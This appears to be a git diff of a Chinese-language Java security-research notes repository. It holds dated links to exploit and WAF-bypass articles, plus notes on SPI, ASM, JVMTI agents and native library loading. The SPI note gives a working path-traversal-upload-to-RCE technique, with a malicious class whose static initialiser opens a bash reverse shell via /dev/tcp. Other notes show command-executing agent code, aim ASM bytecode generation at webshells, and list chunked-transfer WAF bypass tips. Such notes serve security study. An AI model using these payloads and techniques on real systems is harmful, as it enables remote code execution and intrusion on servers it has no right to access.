[chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** ++ 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** ++ 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** ++ 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) ++ 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** ++ 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) ++ 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) ++ 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 ++ 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** ++ 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** ++ 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) ++ 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) ++ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) ++ 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** ++ 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) ++ 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) ++ 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) ++ 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** ++ 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** ++ 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) ++ 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) ++ 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) ++ 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) ++ 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) ++ 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) ++ 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** ++ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) ++ 2023/07/02 [一种基于规则的 JavaWeb 回显方案](https://mp.weixin.qq.com/s/hIPz0LEk_OW_IpUbfKBYMg) ++ 2023/07/11 [企业微信密钥泄露利用小案例](https://mp.weixin.qq.com/s/mptsykGJHmRC87dYqFFqMw) diff --git "a/java\346\227\245\345\270\270/SPI\346\234\272\345\210\266.md" "b/java\346\227\245\345\270\270/SPI\346\234\272\345\210\266.md" new file mode 100644 index 0000000..6541165 --- /dev/null +++ "b/java\346\227\245\345\270\270/SPI\346\234\272\345\210\266.md" @@ -0,0 +1,155 @@ +# SPI机制 + +>最开始接触是springboot写文件rce里面的charsets遇到了,然后发现yaml的反弹也是使用的SPI机制 + +SPI全称Service Provider Interface,是Java提供的一套用来被第三方实现或者扩展的API,或者换句话说,**SPI是一种服务发现机制** + +## demo + +定义接口 SpiService.java + +```java +package com.firebasky.spi; + +public interface SpiService { + public void hello(); +} +``` + +实现接口的方法的类SpiServiceA.java (**需要注意SPI机制的实现类必须有一个无参构造方法**) + +```java +package com.firebasky.spi; + +public class SpiServiceA implements SpiService { + public void hello() { + System.out.println("SpiServiceA.Hello"); + } +} +``` + +SpiServiceB.java + +```java +package com.firebasky.spi; + +public class SpiServiceB implements SpiService { + public void hello() { + System.out.println("SpiServiceB.Hello"); + } +} +``` + +SpiTest + +````java +package com.firebasky.spi; + +import java.util.Iterator; +import java.util.ServiceLoader; + +public class SpiTest { + public static void main(String[] args) throws InterruptedException { + try { + init(); + } catch (Exception e) { + System.out.println("error"); + } + } + public static void init(){ + ServiceLoader serviceLoader = ServiceLoader.load(SpiService.class); + Iterator iterator = serviceLoader.iterator(); + while (iterator.hasNext()) { + SpiService spiService = iterator.next(); + spiService.hello(); + } + } +} +```` + +然后定义META-INF/services +![image-20211219220826826](https://user-images.githubusercontent.com/63966847/146678546-94e017c7-15a4-41f3-8082-4a0083c9b903.png) + + +然后run之后会输出 + +``` +SpiServiceA.Hello +SpiServiceB.Hello +``` + +## 分析 + +也就是我们可以通过spi机制去获得实现接口的类并且实例化去调用方法。 + +调用**next方法**的时候,实际调用到的是,lookupIterator.nextService。它通过反射的方式,创建实现类的实例并返回。 + +![image-20211219221208548](https://user-images.githubusercontent.com/63966847/146678550-d158915b-fd15-4b20-a588-063ed76e7f8c.png) + + +![image-20211219221324358](https://user-images.githubusercontent.com/63966847/146678553-aede21be-261d-4077-9f21-a5ca8d60c4ec.png) + + +需要注意一点如何获得 **cn**这个变量勒,也就是spi实例化什么东西?这个其实是在 **META-INF/services/com.firebasky.spi.SpiService**中配置的。 + +## 新思路 + +那问题来了? + +**环境存在路径穿越上传文件会造成rce?** 会的。 + +如何实现? + +我们上传META-INF/services/com.firebasky.spi.SpiService文件并且覆盖其中的值,写入我们的恶意类的全类名比如: + +``` +com.firebasky.spi.evil +``` + +然后我们在target\classes\下上传我们的evil.class,然后让其在一次的执行spi的操作。就可以成功rce. + +```java +#evil.java +package com.firebasky.spi; + +import java.io.IOException; + +public class evial implements SpiService{ + static { + try{ + Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"}); + }catch (IOException e){ + try{ + Runtime.getRuntime().exec(new String[]{"cmd", "/c", "calc"}); + }catch (IOException ee){ + } + } + } + @Override + public void hello() { + + } +} +``` + +编译成class 之后上传到target\classes\ + +![image-20211219222014485](https://user-images.githubusercontent.com/63966847/146678561-9958bc94-f179-4440-97c4-fbdd2f7e03de.png) + + +在覆盖META-INF/services/com.firebasky.spi.SpiService + +![image-20211219222049642](https://user-images.githubusercontent.com/63966847/146678565-b5a349de-0fa3-4285-ae4c-3ce8a893bae7.png) + + +之后执行一下SpiTest。 +![image-20211219222131132](https://user-images.githubusercontent.com/63966847/146678572-60f7cfe5-32cf-4a40-9cca-b4a9d452d966.png) + + +其实也不是什么新思路,很多大师傅在实现写文件rce的时候就用到了,说不定ctf中可能遇到??? + +>参考: +> +>https://www.cnblogs.com/xrq730/p/11440174.html +> +>https://www.jianshu.com/p/3a3edbcd8f24 diff --git "a/java\346\227\245\345\270\270/asm.md" "b/java\346\227\245\345\270\270/asm.md" new file mode 100644 index 0000000..3c96698 --- /dev/null +++ "b/java\346\227\245\345\270\270/asm.md" @@ -0,0 +1,347 @@ +# asm + +## 分析类 + +分析类的代码 + +```java +public class Test { + public boolean aBoolean = true; + + public void render(){ + System.out.println("hello asm"); + } +} +``` + +MyClassVisitors类 + +```java +import jdk.internal.org.objectweb.asm.ClassVisitor; +import jdk.internal.org.objectweb.asm.FieldVisitor; +import jdk.internal.org.objectweb.asm.MethodVisitor; +import static jdk.internal.org.objectweb.asm.Opcodes.*; + +public class MyClassVisitors extends ClassVisitor { + public MyClassVisitors(){ + super(ASM5); + } + + /** + * 继承关系 + * @param version + * @param access + * @param name + * @param signature + * @param superName + * @param interfaces + */ + public void visit(int version,int access,String name,String signature,String superName,String[] interfaces){ + System.out.println(name + "extends " + superName + "{"); + super.visit(version,access,name,signature,superName,interfaces); + } + + /** + * 属性变量 + * @param access + * @param name + * @param desc + * @param signature + * @param value + * @return + */ + @Override + public FieldVisitor visitField(int access, String name, String desc, String signature, Object value) { + System.out.println(desc + " " + name); + return super.visitField(access, name, desc, signature, value); + } + + /** + * 方法 + * @param access + * @param name + * @param desc + * @param signature + * @param exceptions + * @return + */ + @Override + public MethodVisitor visitMethod(int access, String name, String desc, String signature, String[] exceptions) { + System.out.println(name + " " + desc); + return super.visitMethod(access, name, desc, signature, exceptions); + } + + @Override + public void visitEnd() { + System.out.println("}"); + super.visitEnd(); + } +} +``` + +主程序 + +```java +import jdk.internal.org.objectweb.asm.ClassReader; + +/** + * 通过asm框架分析类 + */ +public class AnalysisClass { + public static void main(String[] args)throws Exception { + MyClassVisitors myClassVisitors = new MyClassVisitors(); + ClassReader classReader = new ClassReader(Test.class.getName()); + classReader.accept(myClassVisitors,0); + } +} +``` + +![image-20220125122358358](https://user-images.githubusercontent.com/63966847/150936112-ab83838c-4f67-4102-9816-ce2afa734559.png) + + +![image-20220125122420194](https://user-images.githubusercontent.com/63966847/150936121-914e2c3a-6019-4f01-91ed-38c5453cab39.png) + + +>该部分也是GI的核心。https://xz.aliyun.com/t/10363 + +## 生成类 + +>感觉用于webshell中。 + +```java +import jdk.internal.org.objectweb.asm.ClassWriter; +import jdk.internal.org.objectweb.asm.MethodVisitor; +import java.io.FileOutputStream; +import static jdk.internal.org.objectweb.asm.Opcodes.*; + +public class WriteClass { + public static void main(String[] args) throws Exception { + ClassWriter classWriter = new ClassWriter(ClassWriter.COMPUTE_MAXS); + // java1.8 public修饰 路径 签名 父类 接口 + classWriter.visit(V1_8, ACC_PUBLIC, "com/firebasky/utils/asm/learn/Learn2Test", null, "java/lang/Object", null); + //public和static修饰 方法名 描述符 签名 异常 + MethodVisitor render = classWriter.visitMethod(ACC_PUBLIC + ACC_STATIC, "render", "()V", null, null); + //插入一个字段是方法里面插入 操作码 路径 名字 描述符 + render.visitFieldInsn(GETSTATIC, "java/lang/System", "out", "Ljava/io/PrintStream;"); + //插入一个ldc + render.visitLdcInsn("Hello asm!"); + //插入一个方法 操作码 路径 方法名 参数 是否为接口的方法 + render.visitMethodInsn(INVOKEVIRTUAL, "java/io/PrintStream", "println", "(Ljava/lang/String;)V", false); + //插入返回值 + render.visitInsn(RETURN); + //设置栈和局部变量大小 + render.visitMaxs(2, 1); + //结束 + render.visitEnd(); + classWriter.visitEnd(); + //生成文件 + byte[] bytes = classWriter.toByteArray(); + FileOutputStream outputStream = new FileOutputStream("d://1.class"); + outputStream.write(bytes); + outputStream.close(); + } +} +``` + +生成的类 + +```java +package com.firebasky.utils.asm.learn; + +public class Learn2Test { + public static void render() { + System.out.println("Hello asm!"); + } +} + +``` + +## 加载或移除类成员 + +主程序 + +```java +import jdk.internal.org.objectweb.asm.ClassReader; +import jdk.internal.org.objectweb.asm.ClassWriter; + +import java.io.FileOutputStream; + +public class Learn3 { + public static void main(String[] args)throws Exception { + ClassReader classReader = new ClassReader(Test.class.getName()); + ClassWriter classWriter = new ClassWriter(ClassWriter.COMPUTE_MAXS); + MyClassVisitor myClassVisitor = new MyClassVisitor(classWriter); + classReader.accept(myClassVisitor,0); + byte[] bytes = classWriter.toByteArray(); + FileOutputStream outputStream = new FileOutputStream("d://1.class"); + outputStream.write(bytes); + outputStream.close(); + } +} +``` + +MyClassVisitor类 + +```java +import jdk.internal.org.objectweb.asm.ClassVisitor; +import jdk.internal.org.objectweb.asm.ClassWriter; +import jdk.internal.org.objectweb.asm.FieldVisitor; +import jdk.internal.org.objectweb.asm.MethodVisitor; +import static jdk.internal.org.objectweb.asm.Opcodes.*; + +public class MyClassVisitor extends ClassVisitor { + + public MyClassVisitor(ClassWriter classWriter) { + super(ASM5, classWriter); + } + + @Override + public FieldVisitor visitField(int access, String name, String desc, String signature, Object value) { + if(name.equals("aBoolean")){ + return null; + } + return super.visitField(access, name, desc, signature, value); + } + + @Override + public MethodVisitor visitMethod(int access, String name, String desc, String signature,String[] exceptions) { + if(name.equals("render")){ + return null; + } + return super.visitMethod(access, name, desc, signature, exceptions); + } + + @Override + public void visitEnd() { + super.visitField(ACC_PRIVATE,"name","Ljava/lang/String;",null,null).visitEnd(); + super.visitMethod(ACC_PRIVATE,"name","(Ljava/lang/String;)V",null,null).visitEnd(); + super.visitEnd(); + } +} +``` + +修改之后的代码 + +```java +package com.firebasky.utils.asm.learn; + +public class Test { + private String name; + + public Test() { + this.aBoolean = true; + } + private void name(String var1) { + } +} + +``` + +## 创建对象和数组 + +```java +import jdk.internal.org.objectweb.asm.ClassWriter; +import jdk.internal.org.objectweb.asm.MethodVisitor; + +import java.io.FileOutputStream; + +import static jdk.internal.org.objectweb.asm.Opcodes.*; + +public class Learn4 { + public static void main(String[] args)throws Exception { + ClassWriter classWriter = new ClassWriter(ClassWriter.COMPUTE_MAXS); + MethodVisitor methodVisitor = classWriter.visitMethod(ACC_PUBLIC, "", "()V", null, null); + methodVisitor.visitTypeInsn(NEW,"java/lang/String"); + methodVisitor.visitLdcInsn("xxx");//常量 + methodVisitor.visitMethodInsn(INVOKEVIRTUAL,"java/lang/String","","(Ljava/lang/String;)V",false); + //生成文件 + byte[] bytes = classWriter.toByteArray(); + FileOutputStream outputStream = new FileOutputStream("d://1.class"); + outputStream.write(bytes); + outputStream.close(); + } +} +``` + +数组 + +```java +methodVisitor.visitIntInsn(SIPUSH,2);//数组长度 +methodVisitor.visitIntInsn(NEWARRAY,T_BYTE);//类型是byte +methodVisitor.visitInsn(DUP);//压 +methodVisitor.visitIntInsn(SIPUSH,0);//插入数组0位置 +methodVisitor.visitIntInsn(SIPUSH,1); +methodVisitor.visitInsn(AASTORE);//保存 +``` + +## 字符串混淆 + +就是在写入的时候做一个转换。 + +```java +import jdk.internal.org.objectweb.asm.ClassReader; +import jdk.internal.org.objectweb.asm.ClassWriter; + +import java.io.FileOutputStream; +import java.io.IOException; + +public class Learn5 { + public static void main(String[] args) throws IOException { + ClassReader classReader = new ClassReader(Test.class.getName()); + ClassWriter classWriter = new ClassWriter(ClassWriter.COMPUTE_MAXS); + MyClassVisitor1 myClassVisitor = new MyClassVisitor1(classWriter); + classReader.accept(myClassVisitor,0); + byte[] bytes = classWriter.toByteArray(); + FileOutputStream outputStream = new FileOutputStream("d://1.class"); + outputStream.write(bytes); + outputStream.close(); + } +} +``` + +MyClassVisitor1 + +```java +import jdk.internal.org.objectweb.asm.ClassVisitor; +import jdk.internal.org.objectweb.asm.ClassWriter; +import jdk.internal.org.objectweb.asm.MethodVisitor; +import java.nio.charset.StandardCharsets; + +import static jdk.internal.org.objectweb.asm.Opcodes.*; + +/** + * 拦截字符串修改 + */ +public class MyClassVisitor1 extends ClassVisitor { + public MyClassVisitor1(ClassWriter classWriter) { + super(ASM5, classWriter); + } + @Override + public MethodVisitor visitMethod(int access, String name, String desc, String signature, String[] exceptions) { + return new MethodVisitor(api,super.visitMethod(access,name,desc,signature,exceptions)) { + @Override + public void visitLdcInsn(Object cst) { + if(cst instanceof String){ + byte[] bytes = ((String) cst).getBytes(StandardCharsets.UTF_8);//转换bytes + mv.visitTypeInsn(NEW,"java/lang/String"); + mv.visitInsn(DUP); + mv.visitIntInsn(SIPUSH,bytes.length); + mv.visitIntInsn(NEWARRAY,T_BYTE); + for(int i = 0;i","([BLjava/lang/String;)V",false); + }else { + super.visitLdcInsn(cst); + } + } + }; + } +} +``` + +将字符串转换成bytes diff --git "a/java\346\227\245\345\270\270/chunked-coding-converter.md" "b/java\346\227\245\345\270\270/chunked-coding-converter.md" new file mode 100644 index 0000000..4cd529f --- /dev/null +++ "b/java\346\227\245\345\270\270/chunked-coding-converter.md" @@ -0,0 +1,20 @@ +# chunked-coding-converter + +[唯快不破的分块传输绕WAF](https://mp.weixin.qq.com/s/pM1ULCqNdQwSB7hcltrbtw) + +[Bypass WAF HTTP协议覆盖+分块传输组合绕过](https://mp.weixin.qq.com/s/2DDYyvsZ5HIQC0qGMK9znQ) + +[利用分块传输吊打所有WAF](https://mp.weixin.qq.com/s/eDiiiVX4oF0LYG3Ia5P4mw) + +[技术讨论 | 在HTTP协议层面绕过WAF](https://www.freebuf.com/news/193659.html) + +[编写Burp分块传输插件绕WAF](https://gv7.me/articles/2019/chunked-coding-converter/) + +[Java反序列化数据绕WAF之延时分块传输](https://gv7.me/articles/2021/java-deserialized-data-bypasses-waf-through-sleep-chunked/) + +``` +只有HTTP/1.1支持分块传输 +POST包都支持分块,不局限仅仅于反序列化和上传包 +Transfer-Encoding: chunked大小写不敏感 +``` + diff --git "a/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" "b/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" new file mode 100644 index 0000000..08a9013 --- /dev/null +++ "b/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" @@ -0,0 +1,95 @@ +# c语言能不能实现agent? + +>面试的时候被问到了,当时不会现在有时间去学习一下,如果真的可以实现那说不定有另一个利用思路? + +在参考文章中已经非常清楚的介绍了,下面我来演示一下。 + +## 运行前 + +agent.cpp + +```c +#include "pch.h" +#include "jvmti.h" +#include + +/* + * java agent有2个启动函数分别为Agent_OnLoad和Agent_OnAttach + * Agent_OnLoad在onload阶段被调用 + * Agent_OnAttach在live阶段被调用 + * 但是每个agent只有一个启动函数会被调用 + */ + + /* + * 此阶段JVM还没有初始化,所以能做的操作比较受限制 + * JVM参数都无法获取 + * The return value from Agent_OnLoad is used to indicate an error. + * Any value other than zero indicates an error and causes termination of the VM. + * 任何非零的返回值都会导致JVM终止。 + */ + +JNIEXPORT jint JNICALL Agent_OnLoad(JavaVM* vm, char* options, void* reserved) { + printf("Agent_OnLoad\n"); + return JNI_OK; +} + + +JNIEXPORT jint JNICALL Agent_OnAttach(JavaVM* vm, char* options, void* reserved) { + printf("Agent_OnAttach\n"); + return JNI_OK; +} + +/* +* This function can be used to clean-up resources allocated by the agent. +*/ +JNIEXPORT void JNICALL Agent_OnUnload(JavaVM* vm) { + printf("Agent_OnUnload\n"); +} +``` + +如果我们在Agent_OnLoad和Agent_OnAttach函数内添加恶意的代码呢?就成功执行命令了吧! + +```c +JNIEXPORT jint JNICALL Agent_OnLoad(JavaVM* vm, char* options, void* reserved) { + printf("Agent_OnLoad\n"); + system("calc"); + return JNI_OK; +} +``` + + +![image-20220108231620529](https://user-images.githubusercontent.com/63966847/148650284-e3237b5b-010a-41c3-a361-5055c6c4d533.png) + + + +## 运行中 + +调用了Agent_OnLoad函数和Agent_OnUnload函数,因为Agent_OnLoad和Agent_OnAttach函数在一个agent中只有一个会被调用,如果你希望在JVM启动时做些事情的话,就使用onload函数,如果希望有外部链接JVM时做一些工作的话就使用attach函数,unload函数在JVM关闭时调用。对于attach函数我们也可以在JVM运行时动态加载本地库并且调用。 + + +![image-20220108232406053](https://user-images.githubusercontent.com/63966847/148650288-8b0a1930-c8f9-4c90-9406-d108a1189b80.png) + + +## 总结一下 + +其实通过c/c++实现的agent更加底层,并且实现的功能和java实现的agent一样(premain/agentmain)[java-agent](https://github.com/Firebasky/Java/blob/main/java%E5%86%85%E5%AD%98%E9%A9%AC/agent/java-agent%E5%AD%A6%E4%B9%A0.pdf) + +``` +Agent_OnLoad在onload阶段被调用 +Agent_OnAttach在live阶段被调用 +Agent_OnUnload在关闭jvm调用 +``` + +不过,没有详细的看官方文档,不过我感觉哈通过c/c++方式实现的agent可扩展性高攻击面广(毕竟可以写c/c++去攻击了) + +不过也要考虑环境,可能javaagent更加适合利用。(个人胡说八道。。。 + + + +参考: + +>https://www.shuzhiduo.com/A/kvJ36qM9zg/ +> +>https://luckymrwang.github.io/2020/12/28/%E7%A0%B4%E8%A7%A3-Java-Agent-%E6%8E%A2%E9%92%88%E9%BB%91%E7%A7%91%E6%8A%80/ +> +>https://gist.github.com/hkalina/5897298 diff --git "a/java\346\227\245\345\270\270/img/image-20220204195334994.png" "b/java\346\227\245\345\270\270/img/image-20220204195334994.png" new file mode 100644 index 0000000..ce2f674 Binary files /dev/null and "b/java\346\227\245\345\270\270/img/image-20220204195334994.png" differ diff --git "a/java\346\227\245\345\270\270/img/image-20220204195638435.png" "b/java\346\227\245\345\270\270/img/image-20220204195638435.png" new file mode 100644 index 0000000..10597d5 Binary files /dev/null and "b/java\346\227\245\345\270\270/img/image-20220204195638435.png" differ diff --git "a/java\346\227\245\345\270\270/img/image-20220204210315090.png" "b/java\346\227\245\345\270\270/img/image-20220204210315090.png" new file mode 100644 index 0000000..f2451f7 Binary files /dev/null and "b/java\346\227\245\345\270\270/img/image-20220204210315090.png" differ diff --git "a/java\346\227\245\345\270\270/img/image-20220204210545634.png" "b/java\346\227\245\345\270\270/img/image-20220204210545634.png" new file mode 100644 index 0000000..d084fc1 Binary files /dev/null and "b/java\346\227\245\345\270\270/img/image-20220204210545634.png" differ diff --git "a/java\346\227\245\345\270\270/img/image-20220325230922109.png" "b/java\346\227\245\345\270\270/img/image-20220325230922109.png" new file mode 100644 index 0000000..c89682d Binary files /dev/null and "b/java\346\227\245\345\270\270/img/image-20220325230922109.png" differ diff --git "a/java\346\227\245\345\270\270/img/image-20221220230825845.png" "b/java\346\227\245\345\270\270/img/image-20221220230825845.png" new file mode 100644 index 0000000..3d05b8e Binary files /dev/null and "b/java\346\227\245\345\270\270/img/image-20221220230825845.png" differ diff --git "a/java\346\227\245\345\270\270/img/image-20221220233047039.png" "b/java\346\227\245\345\270\270/img/image-20221220233047039.png" new file mode 100644 index 0000000..9b6fda5 Binary files /dev/null and "b/java\346\227\245\345\270\270/img/image-20221220233047039.png" differ diff --git "a/java\346\227\245\345\270\270/java\345\206\231\346\226\207\344\273\266rce.md" "b/java\346\227\245\345\270\270/java\345\206\231\346\226\207\344\273\266rce.md" index bd9567c..d833160 100644 --- "a/java\346\227\245\345\270\270/java\345\206\231\346\226\207\344\273\266rce.md" +++ "b/java\346\227\245\345\270\270/java\345\206\231\346\226\207\344\273\266rce.md" @@ -11,3 +11,17 @@ ### 3.如果项目是jar打包启动的 面前自己遇到的是springboot项目 通过覆盖charset.jar去hook实现rce。大概原理就是jvm启动的过程中不会全部加载资源如charset.jar是不会加载的只有通过特点方法才会加载。这样可以减少Java内存的消耗。 参考 文章springboot写文件rce + +### springboot + +https://landgrey.me/blog/22/ + +https://threedr3am.github.io/2021/04/14/JDK8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%9C%BA%E6%99%AF%E4%B8%8B%E7%9A%84SpringBoot%20RCE/ + +### fastjson +https://threedr3am.github.io/2021/04/13/JDK8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%9C%BA%E6%99%AF%E4%B8%8B%E7%9A%84Fastjson%20RCE/ + +> +https://www.cnblogs.com/wh4am1/p/14681335.html + +https://mp.weixin.qq.com/s?__biz=MzI3MzUwMTQwNg==&mid=2247485312&idx=1&sn=22dddceccf679f34705d987181a328db&token=1393640502&lang=zh_CN&scene=21#wechat_redirect diff --git "a/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" new file mode 100644 index 0000000..d797145 --- /dev/null +++ "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" @@ -0,0 +1,75 @@ +# java 加载链接库的方法 + +https://tttang.com/archive/1436/ + +1.System.load + +```java +try { + System.load("D:\\temp\\calc_x64.dll"); +}catch (UnsatisfiedLinkError e){ + e.printStackTrace(); +} +``` + +2.Runtime.getRuntime().load + +```java +Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); +``` + +3.com.sun.glass.utils.NativeLibLoader.loadLibrary + +```java +com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); +``` + +有限制 + +1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 +2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 + +4.反射模拟底层调用 + +- 如果模拟ClassLoader加载就会存在两个方案 + - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 +- 如果模拟NativeLibrary就只存在load方法 + +**ClassLoader#loadLibrary** + +```java +try { + Class clazz = Class.forName("java.lang.ClassLoader"); + Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); + method.setAccessible(true); + method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); +}catch (Exception e){ + e.printStackTrace(); +} +``` + +**NativeLibrary#load** + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); +Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); +con.setAccessible(true); +Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class aClass = Class.forName("sun.misc.Unsafe"); +Constructor declaredConstructor = aClass.getDeclaredConstructor(); +declaredConstructor.setAccessible(true); +Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); +Object obj = unsafe.allocateInstance(a); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + diff --git "a/java\346\227\245\345\270\270/java\345\217\215\345\272\217\345\210\227\345\214\226\347\274\226\347\240\201\347\273\225\350\277\207.md" "b/java\346\227\245\345\270\270/java\345\217\215\345\272\217\345\210\227\345\214\226\347\274\226\347\240\201\347\273\225\350\277\207.md" index 50a1403..db73585 100644 --- "a/java\346\227\245\345\270\270/java\345\217\215\345\272\217\345\210\227\345\214\226\347\274\226\347\240\201\347\273\225\350\277\207.md" +++ "b/java\346\227\245\345\270\270/java\345\217\215\345\272\217\345\210\227\345\214\226\347\274\226\347\240\201\347\273\225\350\277\207.md" @@ -27,4 +27,45 